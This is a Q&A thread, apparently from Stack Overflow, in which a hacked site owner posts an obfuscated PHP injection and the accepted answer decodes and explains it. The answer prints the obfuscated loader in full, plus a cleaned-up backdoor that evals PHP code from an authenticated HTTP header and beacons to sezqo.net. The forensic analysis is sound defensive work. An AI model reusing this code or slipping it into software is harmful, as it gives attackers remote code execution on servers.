My server was hacked a encoded code was injected. i was not able to know what was the purpose of this code ? Please anybody help me

Question

my php files were hacked and some one injected some encoded text in my files. Can any body help my to understand what this code is actually doing. i am not able to decode this.

here is that encoded code piece.

/*versio:3.01*/$II11=110426;if (!function_exists('I11lIl1I')){$GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';function I11lIl1I($a, $b){$c=$GLOBALS['II11']; $d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b));};$QO0000QQ0 = I11lIl1I(3374, 16);$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");};

That's just obfuscated code. You can track down each step it does. — Leri, Nov 20 '13 at 12:03
I haven't taken the time to decode it, these things usually turn out to be loaders for further malicious code. If you were to decode it, the odds are that all you'd learn from it of any value would be the URL that is hosting the real payload code. That URL is probably temporary anyway, so that's really not much use either. Unless you're prepared to a spend fair bit of time following that trail, you'd be better off not worrying about what the code does, but instead spending that effort worrying about how they got in and how to prevent it from recurring. That's the more valuable use of your time — Spudley, Nov 20 '13 at 12:08
Spudley is right. But, I gave you the decoded script anyway and an explaination what it does. It actually gets a script back which would be executed. Maybe you can (carefully!) try to send a fake script URL to that network and then receive the real php code it wants your server to execute... But this is only forensics. It gives you information about what might have happend, and how bad your situation is really. But you will not get a really sure answer (the script sent to you when trying to fool the network, might be a different one). — SDwarfs, Nov 20 '13 at 16:28
Note, my investigation script below gives you the data files of the decoded script for further analysis. This might also give you a hint how this code made it way into your server... just by letting you know which script have been infected and which have not been infected. — SDwarfs, Nov 20 '13 at 16:29

SDwarfs · Accepted Answer · 2013-11-20T17:43:57.033

Short Answer

It announces itself to a bot network or worm, which has "http://sezqo.net/w3.php" as a message relay. This relay is most probably only a server hacked the same way. This "network" then may send a request back (maybe not immediately, but much later) containing the real code to be executed. This code may either replace your website (in all or only some special cases, the script is just executed in front of your code) and it may do anything else a PHP script can do.

The Decoded and Cleaned Up Script

if (!defined("determinator")) {
  if (function_exists("ini_set")) { 
    @ini_set("allow_url_fopen", 1);
    @ini_set("display_errors", 0);
  }

  function w3net_feof($f, &$time = NULL) {
    $time = microtime(true);
    return feof($f);
  }

  function w3net_getfile($host, $URI) {
    if (@ini_get("allow_url_fopen") == "1") {
      return @file_get_contents("http://" . $host . $URI. "&w=fgc");
    } elseif (function_exists("curl_init")){
      $ch = @curl_init();
      @curl_setopt($ch, CURLOPT_URL, "http://" . $host . $URI. "&w=cu");
      @curl_setopt($ch, CURLOPT_HEADER, false);
      @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 6);
      $curl_result = @curl_exec($ch);
      @curl_close($ch);
      if (empty($curl_result)) {
        $curl_result = "";
      }
      return $curl_result;
    } else {
      $f = @fsockopen($host, 80, $errno, $errstr, 5);
      if ($f) {
        $data = "";
        $time = NULL;
        @fputs($f, "GET {$URI}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$host}\r\n");
        $useragent = PHP_OS."/".PHP_VERSION;
        @fputs($f, "User-Agent: {$useragent}\r\n\r\n");
        while(!w3net_feof($f, $time) && (microtime(true) - $time) < 2) {
          $data .= @fgets($f, 128);
        }
        @fclose($f);
        $parts = explode("\r\n\r\n", $data);
        unset($parts[0]);
        return implode("\r\n\r\n", $parts);
      }
    }
  }

  function w3net_output($key, $val) {
    echo "Y_".$key.":".$val."\r\n";
  }

  function php_server($varname){
    return @$_SERVER[$varname];
  }

  $version1="ftp/201309";
  $version2="3.01";
  $host="http://";
  if (isset($_SERVER["HTTPS"])) {
    if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
  }
  $host.=strtolower(@$_SERVER["HTTP_HOST"]);

  foreach ($_GET as $key=>$val) {
    if (strpos($val,"union")) {
      $_GET[$key]="";
    } elseif (strpos($val,"select")) {
      $_GET[$key]="";
    }
  }

  if(!isset($_SERVER["REQUEST_URI"])) {
    $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
    if(isset($_SERVER["QUERY_STRING"])) {
      $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
    }
  }

  function get_temp_directory() {
    $result=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );

    foreach ($tmpdirs as $tmpdir){ 
      if (!empty($tmpdir)){
        $tmpdir.=DIRECTORY_SEPARATOR;
        if (@is_writable($tmpdir)) {
          $result = $tmpdir; break;
        }
      }
    }

    return $result;
  }

  if (strlen($host) < 10) {
    define("determinator", 0);

  } elseif ($requestURL=$host.@$_SERVER["REQUEST_URI"]) {
    $hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
    $w3n_code=get_temp_directory().".".$hash;
    define("determinator", $w3n_code);
    $IlIlII = $w3n_code.".log";
    if (@$_SERVER["HTTP_Y_AUTH"]==$hash) {
      echo "\r\n";
      w3net_output("versio", $version2."-".$version1."-php");
      if ($code=base64_decode(@$_SERVER["HTTP_EXECPHP"])){
        @eval($code);
        echo "\r\n";
        w3net_output("out", "ok");
      }
      exit(0);
    }
    $found = False;
    $ua = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
    foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $pattern) {
      if (strpos($ua, $pattern)!==False) {
        $f = @fopen($w3n_code.".log", "a");
        $requestURI_encoded = @urlencode(@$_SERVER["REQUEST_URI"]);
        @fwrite($f, time()."\t".$pattern."\t".$requestURI_encoded."\n");
        @fclose($f);
        $found=True;
        break;
      }
    }
    if (@is_file($w3n_code)) {
      @touch($w3n_code);
      @include_once($w3n_code);
    } elseif ($found === True) {
      if (@touch($w3n_code)) {
        $requestURL=@urlencode($requestURL);
        $URI = "/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
        $data = w3net_getfile("sezqo.net", $URI);
        @touch($w3n_code);
      }
    }
  } else {
    define("determinator", 1);
  }
}

What the script does (detailed explaination)

OK, what does it do? It first tries to unset some PHP security restrictions (enable "allow_url_fopen" and disable "display_errors"). Then it defines functions w3net_feof() (used by w3net_getfile()) and w3net_getfile($host, $URI). w3net_getfile is used to fetch the data from a URL. It tries different possibilities as file_get_contents (if allow_url_fopen is allowed), libcurl and a simple HTTP implementation via fsocket functions. It also defines a function w3net_output() which is used to output key/value pairs as result of the Request that starts this script. It defines a function php_server() to retrieve variables from $_SERVER, but is never used.

Having done this, it sets some version strings ($version1 and $version2, seems to be an identifier for the script itself). Then it constructs a variable that contains the $host part (including http:// or https://) of the URL that enables to reach your script. It then cleans the $_GET variable from values that contain "union" and "select" (sets the values to a empty string). I assume this is used to shorten the final URL. And -if not yet set - it sets the $_SERVER variable "REQUEST_URI" to $_SERVER["SCRIPT_NAME"]."?".$_SERVER["QUERY_STRING"].

As a next step, it defines a function that looks for a writeable directory, where it can place some downloads.

The next step is to check if $host ("https://" or "http://" is shorter than 10 characters. If this is the case, it stops any further action. This is only the case if the HTTP-Host-Name of the server is shorter than 3 characters. This might be some way to block this script from working on special setups where the hostname is very short (as in a development environment).

The next step is to try, if a $requestURL can be built by $host.@$_SERVER["REQUEST_URI"] and if so, it continues the following:

It constructs a Hash value $hash (using $hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");) which identifies the local System by Hostname, PHP-OS (version), the $version2 "3.01" part of the version string and some salt "QQ0OQ000000Q0OQ0Q".
It then checks, if the current Request has a header "HTTP_Y_AUTH" that equals this hash. If so, it returns some version info to the requesting client machine via w3net_output(). Then it looks for another HTTP header "HTTP_EXECPHP" which is directly executed as PHP code using eval(). After this, the script outputs a return/linefeed and "out" = "ok" via the w3net_output() mechanism. Then it stops the script via exit(0). This part allows a remote machine that knows the exact hash key to access this script and execute PHP code on your machine.
If the hash did not match (or no hash was sent), it checks if the "User Agent" matches some patterns (any string of google,yahoo,baidu,bingbot,msnbot,yandex). These are accesses by search engine crawlers. If so it logs this access into a log file which is named using $w3n_code.".log" where $w3n_code=get_temp_directory().".".$hash; (the hash directory found, the hash value appended and then ".log" appended). It writes one line, consisting of a unixtimestamp, the matched pattern (identifying the search engine) and the encoded requestURI (tab delimited). I assume this is used to log how many search engine traffic is to be expected for this location. If there is a lot of traffic there, the "site" is maybe sold or can be used to push the page rank of some websites by inserting some links to other sites. Also a variable $found is set to "true" that marks the traffic as "search engine crawler".
As a next step, it checks if a file $w3n_code exists, the filename is like the log file above, but without ".log" at its end. If so it runs the contained PHP code.
If this script did not exist yet, it checks if the current request was marked (by $found=true;) as search engine traffic. In that case the script announces itself to network, by a request to "http://sezqo.net/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2. This request contains the $requestURL (how to reach THIS script on your server), the Hash key (that allows to authenticate and to send the script another PHP script to execute) and a type 'php' aswell as the version strings $version1 and $version2. After this, it calls touch() to create an empty scriptfile named $w3n_code. So this request is sent only once, the first search engine comes by.

Further Debugging

Save the following script to your web page (same server) and execute it through the browser, using https:// and http://. It uses the part of the above script which generates the $hash and estimates the storage directory. It outputs the filenames of the script that the network inserted (if already) and of the logfile. In the same directory look for any other files with similar names (especially *.log files). The logfiles will give you information where the "worm" described above has intruded the system (there may be multiple locations). If file without ".log" already exists, the infected script was already announced to the network and might already have executed any code that was send trough the network. If it contains a script, this script is inserted / executed every time your websites script (containing the above code) is called...

NOTE: Not finding those files is not a guarantee, that nothing has happend! As the network might already have send a PHP-script that removed all those traces...

<?php

function get_temp_directory() {
    $result=dirname(__FILE__).DIRECTORY_SEPARATOR;
    $tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );

    foreach ($tmpdirs as $tmpdir){ 
      if (!empty($tmpdir)){
        $tmpdir.=DIRECTORY_SEPARATOR;
        if (@is_writable($tmpdir)) {
          $result = $tmpdir; break;
        }
      }
    }

    return $result;
}

$version1="ftp/201309";
$version2="3.01";
$host="http://";
if (isset($_SERVER["HTTPS"])) {
  if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
}
$host.=strtolower(@$_SERVER["HTTP_HOST"]);

$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
$w3n_code=get_temp_directory().".".$hash;

echo "FILENAMES:<br>\n";
echo $w3n_code."<br>\n";
echo $w3n_code.".log<br>\n";

?>

How I did extract the script

Ok, to know what it does, I decoded and analyzed your script. Here is how...

First we format it a bit more nicely:

    /*versio:3.01*/

    $II11=110426;

    if (!function_exists('I11lIl1I')){
      $GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';

      function I11lIl1I($a, $b){ 
        $c=$GLOBALS['II11'];
        $d=pack('H*','6261736536345f6465636f'.'6465');
        return $d(substr($c, $a, $b));
      };

      $QO0000QQ0 = I11lIl1I(3374, 16);
      $QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
    };

We see, that the code checks, if a function I11lIl1I exists already, if not it defines this function and executes some code. This function takes two parameters $a and $b, which define some part of the decoded string, which is cut out using substr() later in this function. The function takes the encode text $GLOBALS['II11'] and stores it in $c. $d is set to pack('H*','6261736536345f6465636f'.'6465') which results in base64_decode. This function is used to decode the part cut out of $c using the limits $a and $b. The function is called with $a = 3374, $b = 16, resulting in preg_replace which is stored as $QO0000QQ0. Then preg_replace("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO"); is called. Whereas the decoding function I11lIl1Iis used again to fetch some data from the encoded string ($a = 507, $b = 2862).

The data from I11lIl1I(507,2862) is:

eval(gzuncompress(base64_decode("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")));

This preg_replace(...) call uses a pattern "/.../e", which looks for the string Q0QO00QOO in the string Q0QO00QOO and executes I11lIl1I(507, 2862) (the decoded string) above for every occurance. The code contains eval(gzuncompress(base64_decode(" "))); which again base64-decodes a string then uncompresses the binary data and evaluates (=executes its php code) it.

The uncompressed, base64-decoded text is again some php code, which pretified looks like this:

if (!defined("determinator")) {
  if (function_exists(I11lIl1I(1, 10))) { 
    @ini_set(I11lIl1I(14, 20), 1);
    @ini_set(I11lIl1I(34, 19), 0);
  }

  function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
    $I1lI1I = microtime(true);
    return feof($Q0OOOQ);
  }

